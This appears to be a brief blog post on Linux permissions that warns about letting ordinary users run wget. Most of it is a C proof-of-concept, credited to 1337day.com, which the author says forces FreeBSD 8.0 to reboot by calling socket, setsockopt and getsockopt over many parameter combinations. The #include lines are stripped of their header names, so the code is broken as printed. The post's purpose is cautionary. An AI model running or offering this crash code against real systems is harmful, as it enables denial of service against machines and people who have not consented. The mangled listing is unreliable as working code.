Linux Capabilities.
its actually this is a matter of permissions, but we often forgot the small things, and the impact of forgetful trivial problem is very large. As I wrote before about "wget" while makes it easy but also to be a disaster, why be a disaster?. because if you allow a normal user to do a wget then he can use your server as a server to download, or the user can download exploits that can be used to damage the system and seize the user "root" in your system.
I give example code I took from 1337day.com than this code can make freebsd 8.0 force reboot if attacker run this code in your system.
#include
#include
#define PAGE_SIZE 4096
#include
#include
#include
main() {
int k,fd,i2,i3,i4,i5,i6,i7,i8;
char *p;
char buf[4096];
for (i2=0;i2<256;i2++) {
for (i3=0;i3<2;i3++) {
for (i4=0;i4<2;i4++) {
fd = socket(i2, i3, i4);
if (fd < 0) continue;
printf("SUCCESS!\n");
for (i5=0;i5<100;i5++) {
for (i6=0;i6<100;i6++) {
setsockopt(fd, i5, i6, buf, 4);
getsockopt(fd, i5, i6, buf, &i7);
}}}}}
}
0 comments:
Post a Comment